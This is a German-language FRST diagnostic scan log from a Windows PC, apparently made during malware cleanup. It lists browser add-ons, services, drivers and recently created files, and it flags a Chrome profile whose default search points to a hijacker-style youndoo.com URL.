BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-22]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxps://www.google.com/
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-05-09] ()
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [113592 2017-05-22] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-05-22] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-22] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [93624 2017-05-22] (Malwarebytes)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-22 18:29 - 2017-05-22 18:29 - 00005487 _____ C:\Users\Dino\Desktop\Mbam.txt
2017-05-22 18:29 - 2017-05-22 18:29 - 00000000 ___HD C:\OneDriveTemp
2017-05-22 18:25 - 2017-05-22 18:29 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-05-22 18:25 - 2017-05-22 18:29 - 00113592 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-05-22 18:25 - 2017-05-22 18:29 - 00093624 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-05-22 18:25 - 2017-05-22 18:29 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00187320 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\Program Files\Malwarebytes
2017-05-22 18:25 - 2017-05-09 16:37 - 00077440 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-05-22 18:15 - 2017-05-22 18:10 - 04102600 _____ C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
2017-05-22 18:13 - 2017-05-22 18:19 - 00000000 ____D C:\AdwCleaner
2017-05-21 21:26 - 2017-05-21 21:31 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.26.49_log.txt
2017-05-21 21:24 - 2017-05-22 18:36 - 00022170 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-21 21:24 - 2017-05-22 18:35 - 00049308 _____ C:\Users\Dino\Desktop\Addition.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-21 21:04 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-22 18:36 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
